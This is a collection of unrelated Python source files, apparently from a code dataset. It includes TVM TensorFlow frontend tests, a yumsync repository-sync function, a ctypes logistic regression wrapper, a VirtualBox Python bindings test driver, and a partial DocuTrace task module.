["StatefulPartitionedCall:0", z2.name],
mode="vm",
init_global_variables=True,
)
def _test_spop_placeholder_with_shape_and_default_value():
with tf.Graph().as_default():
data = np.ones([1], dtype=int).astype(np.int32)
dataVar = tf.Variable(data, shape=data.shape)
pl1 = array_ops.placeholder_with_default(dataVar, shape=data.shape, name="pl1")
tpl = tf.convert_to_tensor(pl1, dtype=tf.int32)
@function.Defun(*[tf.int32])
def pl_with_default(pl):
return tf.expand_dims(tf.multiply(pl, pl), 0)
z = gen_functional_ops.StatefulPartitionedCall(
args=[tpl], Tout=[tf.int32], f=pl_with_default
)
compare_tf_with_tvm(
data, ["pl1:0"], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_arange_feed():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), "t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, (3, 3, 3), "t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_array_feed():
with tf.Graph().as_default():
t1_data = np.array([[-1, 1, 3], [2, -2, 4], [2, -3, 14]], dtype=np.int32)
t2_data = np.array([[-2, 1, 2], [12, -2, 14], [12, -3, 4]], dtype=np.int32)
t1 = tf.placeholder(tf.int32, name="t1")
t2 = tf.placeholder(tf.int32, name="t2")
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_basic():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_nested():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), name="t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, name="t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def myfunc(x, y):
return tf.add(x, y, "myfunc")
@tf.function
def myfunc2(x, y):
z = myfunc(x, y)
l = myfunc(z, y)
m = myfunc(l, z)
return tf.add(l, m, "myfunc2")
res1 = myfunc(t1, t2)
res2 = myfunc2(res1, t1)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [res2.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_no_autograph():
with tf.Graph().as_default():
@tf.function(autograph=False)
def fun1(a):
return tf.multiply(a, a)
@tf.function(autograph=False)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_defun():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)],
Tout=[dtypes.float32],
f=fun3,
name="SpopFnInvocation",
)
compare_tf_with_tvm([], [], "SpopFnInvocation:0", mode="vm", init_global_variables=True)
def _test_spop_arithmetic():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 3)
def arithmetic(m, x, c):
z = tf.add(tf.multiply(m, x), c)
return z
m = tf.constant(10)
x = tf.constant(20)
c = tf.constant(2)
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[m, x, c], Tout=[tf.int32], f=arithmetic
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_control_flow():
with tf.Graph().as_default():
@function.Defun(*[dtypes.float32] * 2)
def Body1(x, y):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:0"):
z = math_ops.multiply(x, y)
i = 0
while i < 10:
i += 1
if i == 5:
continue
z = math_ops.multiply(x, y * i)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[constant_op.constant(32.0), constant_op.constant(100.0)],
Tout=[dtypes.float32],
f=Body1,
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_variables():
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32)
var2 = tf.Variable(const2, dtype=tf.int32)
@function.Defun(tf.int32, tf.int32)
def Forward(x, y):
return tf.multiply(x, y)
z = gen_functional_ops.StatefulPartitionedCall(
args=[var1, var2], Tout=[tf.int32], f=Forward
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", init_global_variables=True, mode="vm"
)
def _test_spop_constants():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 2)
def constantsFn(x, y):
vv = tf.constant([2, 3, 4], name="vv")
z = tf.add(vv + x, y)
return z
a = tf.constant(20000, name="a")
b = tf.constant(40000, name="b")
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[a, b], Tout=[tf.int32], f=constantsFn
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_stateful():
# This test case is to test that TVM rejects any TF stateful operations
# (including Resource Variables) except StatefulPartitionedCall/PartitionedCall
# (as these two operators can still be used as container graphs to execute
# "stateless" operations internally.
tf.reset_default_graph()
with tf.Graph().as_default():
@tf.function
def FunctionWithStatefulOp_One(i):
b = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
y = tf.multiply(b, i)
return y
@tf.function
def FunctionWithStatefulOp(m, n):
a = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
x = tf.multiply(a, m)
y = FunctionWithStatefulOp_One(n)
z = tf.multiply(x, y)
return z
op = FunctionWithStatefulOp(constant_op.constant(1.0), constant_op.constant(2.0))
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm([], [], [op.name], init_global_variables=True, mode="vm")
assert execinfo.value.args[0].startswith("The following operators are not implemented")
def _test_spop_device_assignment():
# This test case is to test that TVM rejects inconsistent device assignment
# while using StatefulPartitionedCall/PartitionedCall operators which in case of TVM will
# be used as container graphs to internally execute "stateless" operations.
tf.reset_default_graph()
with tf.Graph().as_default():
def fun1(a):
with ops.device("/GPU:0"):
return tf.multiply(a, a)
def fun2(b):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:1"):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
with ops.device("/CPU:0"):
x = fun2(x)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:2"):
y = fun1(y)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:3"):
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)], Tout=[dtypes.float32], f=fun3
)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Found inconsistent Device assignment")
def _test_spop_resource_variables():
# This test case is to test that TVM rejects any graph containing
# resource variables with StatefulPartitionedOp.
tf.reset_default_graph()
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32, use_resource=True)
var2 = tf.Variable(const2, dtype=tf.int32, use_resource=True)
@tf.function
def resourceVariablesTest(x, y):
return tf.multiply(x, y)
op = resourceVariablesTest(var1, var2)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Graph is not frozen." " Provide a frozen graph")
def test_forward_spop():
_test_spop_stateful()
_test_spop_device_assignment()
_test_spop_resource_variables()
# Placeholder test cases
_test_spop_placeholder_without_shape_info()
_test_spop_placeholder_with_shape_and_default_value()
_test_spop_placeholder_numpy_arange_feed()
_test_spop_placeholder_numpy_array_feed()
# Function Invocation test cases
_test_spop_function_invocation_basic()
_test_spop_function_invocation_nested()
_test_spop_function_invocation_no_autograph()
_test_spop_function_invocation_defun()
# Test cases for various other TF constructs
_test_spop_arithmetic()
_test_spop_control_flow()
_test_spop_variables()
_test_spop_constants()
#######################################################################
# Dynamic input shape
# -------------------
def test_forward_dynamic_input_shape():
tf.reset_default_graph()
with tf.Graph().as_default():
data = tf.placeholder(tf.float32, name="data", shape=(None,))
out = data + 1
np_data = np.random.uniform(size=(2,)).astype("float32")
out_name = "add"
with tf.Session() as sess:
graph_def = tf_testing.AddShapesToGraphDef(sess, out_name)
tf_output = run_tf_graph(sess, np_data, "data:0", ["{}:0".format(out_name)])
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
np_data,
["data"],
1,
target=device,
layout="NCHW",
out_names=[out_name],
mode="vm",
ignore_in_shape=True,
)
tvm.testing.assert_allclose(tvm_output[0], tf_output[0], rtol=1e-5, atol=1e-5)
def test_forward_dynmaic_rnn_lstmblockcell():
if package_version.parse(tf.VERSION) >= package_version.parse("2.0.0"):
return
total_series_length = 50000
truncated_backprop_length = 15
state_size = 4
echo_step = 3
batch_size = 5
num_layers = 5
def generateData():
x = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))
y = np.roll(x, echo_step)
y[0:echo_step] = 0
x = x.reshape((batch_size, -1)) # The first index changing slowest, subseries as rows
y = y.reshape((batch_size, -1))
return (x, y)
batchX_placeholder = tf.placeholder(tf.float32, [batch_size, truncated_backprop_length])
init_state = tf.placeholder(tf.float32, [num_layers, 2, batch_size, state_size])
state_per_layer_list = tf.unstack(init_state, axis=0)
rnn_tuple_state = tuple(
[
tf.nn.rnn_cell.LSTMStateTuple(
state_per_layer_list[idx][0], state_per_layer_list[idx][1]
)
for idx in range(num_layers)
]
)
# Forward passes
def lstm_cell():
return tensorflow.contrib.rnn.LSTMBlockCell(state_size)
cell = tf.nn.rnn_cell.MultiRNNCell(
[lstm_cell() for _ in range(num_layers)], state_is_tuple=True
)
states_series, current_state = tf.nn.dynamic_rnn(
cell, tf.expand_dims(batchX_placeholder, -1), initial_state=rnn_tuple_state
)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
x, y = generateData()
_current_state = np.zeros((num_layers, 2, batch_size, state_size))
start_idx = 0
end_idx = start_idx + truncated_backprop_length
batchX = x[:, start_idx:end_idx]
# Save current state for TVM
current_state_tvm = _current_state
_current_state, _states_series = sess.run(
[current_state, states_series],
feed_dict={batchX_placeholder: batchX, init_state: _current_state},
)
# Organize results and corresponding names
tf_output = [_states_series]
for c in _current_state:
tf_output.append(c.c)
tf_output.append(c.h)
name = [states_series.name.split(":")[0]]
for t in current_state:
name.append(t.c.name.split(":")[0])
name.append(t.h.name.split(":")[0])
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(sess, graph_def, name)
tvm_output = run_tvm_graph(
final_graph_def,
[batchX.astype("float32"), current_state_tvm.astype("float32")],
["Placeholder", "Placeholder_1"],
out_names=name,
num_output=len(name),
mode="vm",
disabled_pass=["FoldScaleAxis"],
)
# Compare result
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Unique
# ------------
def _test_unique(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique(in_data)
if is_dyn:
compare_tf_with_tvm(np_data, "in_data:0", ["Unique:0", "Unique:1"], mode="vm")
else:
compare_tf_with_tvm(None, "", ["Unique:0", "Unique:1"])
def test_forward_unique():
"""test Unique"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique(50, dtype, is_dyn)
_test_unique(100, dtype, is_dyn)
#######################################################################
# Unique with counts
# ------------
def _test_unique_with_counts(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique_with_counts(in_data)
if is_dyn:
compare_tf_with_tvm(
np_data,
"in_data:0",
["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
mode="vm",
)
else:
compare_tf_with_tvm(
None, "", ["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"]
)
def test_forward_unique_with_counts():
"""test UniqueWithCounts"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique_with_counts(10, dtype, is_dyn)
_test_unique_with_counts(20, dtype, is_dyn)
if __name__ == "__main__":
pytest.main([__file__])
|
__init__.py | import os
import sys
import multiprocessing
import signal
import urlparse
from yumsync import util, progress
from yumsync.log import log
from yumsync.metadata import __version__
def sync(repos=None, callback=None):
""" Mirror repositories with configuration data from multiple sources.
Handles all input validation and higher-level logic before passing control
on to threads for doing the actual syncing. One thread is created per
repository to alleviate the impact of slow mirrors on faster ones.
"""
if repos is None:
repos = []
prog = progress.Progress() # callbacks talk to this object
manager = multiprocessing.Manager()
queue = manager.Queue()
processes = []
def signal_handler(_signum, _frame):
""" Inner method for terminating threads on signal events.
This method uses os.kill() to send a SIGKILL directly to the process ID
because the child processes are running blocking calls that will likely
take a long time to complete.
"""
log('Caught exit signal - aborting')
while len(processes) > 0:
for proc in processes:
os.kill(proc.pid, signal.SIGKILL)
if not proc.is_alive():
processes.remove(proc)
sys.exit(1) # safe to do exit() here because we are a worker
# Catch user-cancelled or killed signals to terminate threads.
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
for repo in repos:
prog.update(repo.id) # Add the repo to the progress object
yumcallback = progress.YumProgress(repo.id, queue, callback)
repocallback = progress.ProgressCallback(queue, callback)
repo.set_yum_callback(yumcallback)
repo.set_repo_callback(repocallback)
proc = multiprocessing.Process(target=repo.sync)
processes.append(proc)
proc.start()
while len(processes) > 0:
# If data is waiting in the queue from the workers, process it. This
# needs to be done in the current scope so that one progress object may
# hold all of the results. (This might be easier with Python 3's
# nonlocal keyword).
while not queue.empty():
event = queue.get()
if not 'action' in event:
continue
if event['action'] == 'repo_init' and 'data' in event:
prog.update(event['repo_id'], set_total=event['data'][0])
elif event['action'] == 'download_end' and 'data' in event:
prog.update(event['repo_id'], pkgs_downloaded=event['data'][0])
elif event['action'] == 'repo_metadata' and 'data' in event:
prog.update(event['repo_id'], repo_metadata=event['data'][0])
elif event['action'] == 'repo_error' and 'data' in event:
prog.update(event['repo_id'], repo_error=event['data'][0])
elif event['action'] == 'pkg_exists':
prog.update(event['repo_id'], pkgs_downloaded=1)
elif event['action'] == 'link_local_pkg':
prog.update(event['repo_id'], pkgs_downloaded=1)
elif event['action'] == 'repo_complete':
pass # should already know this, but handle it anyways.
elif event['action'] == 'delete_pkg':
pass
elif event['action'] == 'repo_group_data':
pass
for proc in processes:
if not proc.is_alive():
processes.remove(proc)
# Return tuple (#repos, #fail, elapsed time)
return (len(repos), prog.totals['errors'], prog.elapsed())
|
model.py | from ctypes import *
import numpy as np
import os
import shutil
from threading import Thread
liblr = cdll.LoadLibrary(os.path.dirname(os.path.realpath(__file__))+'/liblr.so')
def accuracy(y, pred, size):
hit = 0.0
for i in range(size):
if y[i] == 1.0 and pred[i] > 0.5:
hit += 1.0
if y[i] == 0.0 and pred[i] <= 0.5:
hit += 1.0
return hit/size
class LogisticRegression(object):
def __init__(self, max_iter=200, alpha=0.01, l2_lambda=0.0, tolerance=0.001, seed=2018, use_batch=False):
self.max_iter = max_iter
self.alpha = alpha
self.l2_lambda = l2_lambda
self.tolerance = tolerance
self.seed = seed
self.use_batch = use_batch
self.fmodel = None
self.auto_clear = True
# support python list, numpy array
def fit(self, features, labels, batch_size=128, early_stopping_round=100, metric=accuracy):
# convert to numpy array
# if not isinstance(features, np.ndarray):
features = np.asarray(features, dtype=np.double)
labels = np.ascontiguousarray(np.asarray(labels, dtype=np.int32), dtype=np.int32)
# convert to ctypes's type
row, col = features.shape
int_p = cast(labels.ctypes.data, POINTER(c_int))
double_p_p = (features.ctypes.data + np.arange(features.shape[0]) * features.strides[0]).astype(np.uintp)
char_p = c_char_p(str("0"*25).encode('utf-8'))
# call the C function
DOUBLEPP = np.ctypeslib.ndpointer(dtype=np.uintp, ndim=1, flags='C')
INTP = POINTER(c_int)
METRIC = CFUNCTYPE(c_double, POINTER(c_double), POINTER(c_double), c_int)
liblr.lr_fit.argtypes = [DOUBLEPP,INTP,c_int,c_int,c_int,c_double,c_double,c_double,c_int,c_bool, c_int,c_int,c_char_p, METRIC]
liblr.lr_fit.restype = None
# enable interrupt
t = Thread(target=liblr.lr_fit, args=(double_p_p,int_p,c_int(row),c_int(col),c_int(self.max_iter),c_double(self.alpha),c_double(self.l2_lambda),c_double(self.tolerance),c_int(self.seed), c_bool(self.use_batch), c_int(batch_size), c_int(early_stopping_round),char_p,METRIC(metric)))
t.daemon = True
t.start()
while t.is_alive():
t.join(0.1)
# get the result
self.fmodel = char_p.value
def predict_prob(self, features):
assert self.fmodel is not None
# convert to numpy array
features = np.asarray(features, dtype=np.double)
# convert to ctypes's type
row, col = features.shape
double_p_p = (features.ctypes.data + np.arange(features.shape[0]) * features.strides[0]).astype(np.uintp)
ret_double_p = (c_double*row)(*([-1.0 for _ in range(row)]))
# call C function
DOUBLEPP = np.ctypeslib.ndpointer(dtype=np.uintp,ndim=1,flags='C')
liblr.lr_predict_prob.argtypes = [DOUBLEPP, c_int, c_int, c_char_p, POINTER(c_double)]
liblr.lr_predict_prob.restype = None
# enable interrupt
t = Thread(target=liblr.lr_predict_prob, args=(double_p_p, c_int(row), c_int(col), c_char_p(self.fmodel),ret_double_p))
t.daemon = True
t.start()
while t.is_alive():
t.join(0.1)
return [ret_double_p[i] for i in range(row)]
def predict(self, features):
assert self.fmodel is not None
prob = self.predict_prob(features)
return [1 if p>0.5 else 0 for p in prob]
def save(self, path):
shutil.copy(self.fmodel, path)
def load(self, path):
self.fmodel = path.encode('utf-8')
self.auto_clear = False
def __del__(self):
if self.auto_clear:
os.remove(self.fmodel) |
tdPython1.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# $Id: tdPython1.py $
"""
VirtualBox Validation Kit - Python Bindings Test #1
"""
__copyright__ = \
"""
Copyright (C) 2010-2015 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
The contents of this file may alternatively be used under the terms
of the Common Development and Distribution License Version 1.0
(CDDL) only, as it comes in the "COPYING.CDDL" file of the
VirtualBox OSE distribution, in which case the provisions of the
CDDL are applicable instead of those of the GPL.
You may elect to license modified versions of this file under the
terms and conditions of either the GPL or the CDDL or both.
"""
__version__ = "$Revision: 100880 $"
# Standard Python imports.
import os
import sys
import time
import threading
import types
# Only the main script needs to modify the path.
try: __file__
except: __file__ = sys.argv[0];
g_ksValidationKitDir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))));
sys.path.append(g_ksValidationKitDir);
# Validation Kit imports.
from testdriver import reporter;
from testdriver import base;
from testdriver import vbox;
class tdPython1(vbox.TestDriver):
"""
Python Bindings Test #1.
"""
def __init__(self):
vbox.TestDriver.__init__(self);
self.asRsrcs = None;
#
# Overridden methods.
#
def actionConfig(self):
"""
Import the API.
"""
if not self.importVBoxApi():
return False;
return True;
def actionExecute(self):
"""
Execute the testcase.
"""
return self.testEventQueueWaiting() \
and self.testEventQueueInterrupt();
#
# Test execution helpers.
#
def testEventQueueWaitingThreadProc(self):
""" Thread procedure for checking that waitForEvents fails when not called by the main thread. """
try:
rc2 = self.oVBoxMgr.waitForEvents(0);
except:
return True;
reporter.error('waitForEvents() returned "%s" when called on a worker thread, expected exception.' % (rc2,));
return False;
def testEventQueueWaiting(self):
"""
Test event queue waiting.
"""
reporter.testStart('waitForEvents');
# Check return values and such.
for cMsTimeout in (0, 1, 2, 3, 256, 1000, 0):
iLoop = 0;
while True:
try:
rc = self.oVBoxMgr.waitForEvents(cMsTimeout);
except:
reporter.errorXcpt();
break;
if not isinstance(rc, types.IntType):
reporter.error('waitForEvents returns non-integer type');
break;
if rc == 1:
break;
if rc != 0:
reporter.error('waitForEvents returns "%s", expected 0 or 1' % (rc,));
break;
iLoop += 1;
if iLoop > 10240:
reporter.error('waitForEvents returns 0 (success) %u times. '
'Expected 1 (timeout/interrupt) after a call or two.'
% (iLoop,));
break;
if reporter.testErrorCount() != 0:
break;
# Check that we get an exception when trying to call the method from
# a different thread.
reporter.log('If running a debug build, you will see an ignored assertion now. Please ignore it.')
sVBoxAssertSaved = os.environ.get('VBOX_ASSERT', 'breakpoint');
os.environ['VBOX_ASSERT'] = 'ignore';
oThread = threading.Thread(target=self.testEventQueueWaitingThreadProc);
oThread.start();
oThread.join();
os.environ['VBOX_ASSERT'] = sVBoxAssertSaved;
return reporter.testDone()[1] == 0;
def interruptWaitEventsThreadProc(self):
""" Thread procedure that's used for waking up the main thread. """
time.sleep(2);
try:
rc2 = self.oVBoxMgr.interruptWaitEvents();
except:
reporter.errorXcpt();
else:
if rc2 is True:
return True;
reporter.error('interruptWaitEvents returned "%s" when called from other thread, expected True' % (rc2,));
return False;
def testEventQueueInterrupt(self):
"""
Test interrupting an event queue wait.
"""
reporter.testStart('interruptWait');
# interrupt ourselves first and check the return value.
for i in range(0, 10):
try:
rc = self.oVBoxMgr.interruptWaitEvents();
except:
reporter.errorXcpt();
break;
if rc is not True:
reporter.error('interruptWaitEvents returned "%s" expected True' % (rc,));
break
if reporter.testErrorCount() == 0:
#
# Interrupt a waitForEvents call.
#
# This test ASSUMES that no other events are posted to the thread's
# event queue once we've drained it. Also ASSUMES the box is
# relatively fast and not too busy because we're timing sensitive.
#
for i in range(0, 4):
# Try quiesce the event queue.
for _ in range(1, 100):
self.oVBoxMgr.waitForEvents(0);
# Create a thread that will interrupt us in 2 seconds.
try:
oThread = threading.Thread(target=self.interruptWaitEventsThreadProc);
oThread.setDaemon(False);
except:
reporter.errorXcpt();
break;
cMsTimeout = 20000;
if i == 2:
cMsTimeout = -1;
elif i == 3:
cMsTimeout = -999999;
# Do the wait.
oThread.start();
msNow = base.timestampMilli();
try:
rc = self.oVBoxMgr.waitForEvents(cMsTimeout);
except:
reporter.errorXcpt();
else:
msElapsed = base.timestampMilli() - msNow;
# Check the return code and elapsed time.
if not isinstance(rc, types.IntType):
reporter.error('waitForEvents returns non-integer type after %u ms, expected 1' % (msElapsed,));
elif rc != 1:
reporter.error('waitForEvents returned "%s" after %u ms, expected 1' % (rc, msElapsed));
if msElapsed > 15000:
reporter.error('waitForEvents after %u ms, expected just above 2-3 seconds' % (msElapsed,));
elif msElapsed < 100:
reporter.error('waitForEvents after %u ms, expected more than 100 ms.' % (msElapsed,));
oThread.join();
oThread = None;
if reporter.testErrorCount() != 0:
break;
reporter.log('Iteration %u was successful...' % (i + 1,));
return reporter.testDone()[1] == 0;
if __name__ == '__main__':
sys.exit(tdPython1().main(sys.argv));
|
Tasks.py | import sys
from threading import Thread
from collections import OrderedDict
from argparse import ArgumentTypeError
from time import sleep
from threading import Thread, Event
from alive_progress import alive_bar
from DocuTrace.Analysis.DataCollector import DataCollector
from DocuTrace.Analysis.ComputeData import ComputeData, top_n_sorted
from DocuTrace.Utils.Logging import debug, logger
from DocuTrace.Utils.Validation import validate_user_uuid, str2bool, validate_task, validate_doc_uuid
from DocuTrace.Utils.Exceptions import InvalidTaskIDError
from DocuTrace.Gui import main as gui
"""Provides functions to begin each task
"""
def task_1(data_collector: DataCollector, args):
logger.info(
'Task 1: The core functionality of this application is written in python.')
def task_2a(data_collector: DataCollector, args):
logger.info(
'Task 2a. Specifiy a document UUID, and return a histogram of countries of the viewers.')
#! Render histogram inside gui
#! Supply n_countries modification logic
try:
doc_uuid = get_doc_uuid(args)
n = get_n(args)
compute = ComputeData(data_collector)
compute.construct_document_counts_figure(doc_uuid, show_continents=False, n_countries=n)
gui.open(compute, doc_uuid=doc_uuid, n=n, start_tab='Task 2a')
except Exception as e:
logger.exception('Exception encountered during Task 2a')
def task_2b(data_collector: DataCollector, args):
logger.info(
'Task 2b. Group the countries by continent, and generate a histogram of the continents of the viewers.')
#! Render histogram inside gui
try:
doc_uuid = get_doc_uuid(args)
n = get_n(args)
compute = ComputeData(data_collector)
compute.construct_document_counts_figure(
doc_uuid, show_countries=False, n_countries=n)
gui.open(compute, doc_uuid=doc_uuid, n=n, start_tab='Task 2b')
except Exception as e:
logger.exception('Exception encountered during Task 2a')
def task_3a(data_collector: DataCollector, args):
logger.info('Task 3a: Histogram of verbose views by browser.')
try:
n = get_n(args)
compute = ComputeData(data_collector)
compute.construct_counts_figure(show_continents=False, show_countries=False, n_browsers=n, clean_browser_names=False)
gui.open(compute, n=n, start_tab='Task 3a')
except Exception as e:
logger.exception('Exception encountered during Task 3a')
def task_3b(data_collector: DataCollector, args):
logger.info(
'Task 3b: Histogram of views by browser, with processed browser names.')
#! Render histogram inside gui
#! Supply n_browsers modification logic
try:
n = get_n(args)
compute = ComputeData(data_collector)
compute.construct_counts_figure(show_continents=False, show_countries=False, n_browsers=n, clean_browser_names=True)
gui.open(compute, n=n, start_tab='Task 3b')
except Exception as e:
logger.exception('Exception encountered during Task 3b')
def task_4(data_collector: DataCollector, args):
logger.info('Task 4d: 10 most avid readers.')
try:
n = get_n(args)
compute = ComputeData(data_collector)
compute.sort(sort_countries=False,
sort_continents=False, sort_browsers=False)
gui.open(compute, n=n, start_tab='Task 4')
# for i, profile in enumerate(compute.reader_profiles.values()):
# if i < 10:
# print('{:{width}} | {}'.format(i, profile, width=4))
except Exception as e:
logger.exception('Exception encountered during Task 4')
def task_5d(data_collector: DataCollector, args):
logger.info('Task 5d: Also likes top n documents.')
#! Dont forget to catch key errors
try:
doc_uuid = get_doc_uuid(args)
user_uuid = get_user_uuid(args)
n = get_n(args)
compute = ComputeData(data_collector)
also_likes = compute.also_likes(doc_uuid, user_uuid, sort_fn=top_n_sorted, n=n)
gui.open(compute, doc_uuid, user_uuid, n, start_tab='Task 5d')
# for i, doc in enumerate(also_likes):
# print(i+1, ' | ', doc)
except Exception as e:
logger.exception('Exception encountered during Task 5d')
def task_6(data_collector: DataCollector, args):
logger.info('Task 6: Also likes graph, inside GUI.')
#! Dont forget to catch key errors
try:
doc_uuid = get_doc_uuid(args)
user_uuid = get_user_uuid(args)
n = get_n(args)
compute = ComputeData(data_collector)
also_likes = compute.also_likes(doc_uuid, user_uuid, sort_fn=top_n_sorted, n=n)
gui.open(compute, doc_uuid, user_uuid, n, start_tab='Task 6')
# for i, doc in enumerate(also_likes):
# print(i+1, ' | ', doc)
except Exception as e:
logger.exception('Exception encountered during Task 6')
def task_7(data_collector: DataCollector, args):
logger.info('Task 7: Open the GUI')
try:
doc_uuid = get_doc_uuid(args)
user_uuid = get_user_uuid(args)
n = get_n(args)
compute = ComputeData(data_collector)
also_likes = compute.also_likes(
doc_uuid, user_uuid, sort_fn=top_n_sorted, n=n)
gui.open(compute, doc_uuid, user_uuid, n, start_tab='Task 6')
# for i, doc in enumerate(also_likes):
# print(i+1, ' | ', doc)
except Exception as e:
logger.exception('Exception encountered during Task 7')
def task_8(data_collector: DataCollector, args):
logger.info('Task 8: Command line, This is it!')
task_picker = OrderedDict()
task_picker['1'] = task_1
task_picker['2a'] = task_2a
task_picker['2b'] = task_2b
task_picker['3a'] = task_3a
task_picker['3b'] = task_3b
task_picker['4'] = task_4
task_picker['5d'] = task_5d
task_picker['6'] = task_6
task_picker['7'] = task_7
task_picker['8'] = task_8
def next_item(key, task_dict=task_picker) -> str:
"""Get the item after the key given to the function
Args:
key (str): A valid key from task_dict
Returns:
str: The next key, or if the final key is given return the first key.
"""
try:
return list(task_dict)[list(task_dict.keys()).index(key) + 1]
except IndexError as e:
return '1'
def raise_invalid_task(*args, **kwargs):
"""Function that raises error, used when accessing the task_picker dict
Raises:
InvalidTaskIDError: Raised when the task is invalid
"""
raise InvalidTaskIDError
def tasks(data_collector: DataCollector, thread: Thread, task_id: str, args) -> None:
"""Display a loading bar for the data processing, once processing is complete start the task based on the ArgParse parameters.
Args:
data_collector (DataCollector): Instance of the DataCollector class used to process the file.
thread (Thread): The thread currently processing the file
task_id (str): The validated identifier of the task to begin running
args (Namespace): The CLI arguments
"""
finished = False
loading_event = Event()
loading_bar = Thread(target=loading_data, args=(loading_event,), daemon=True)
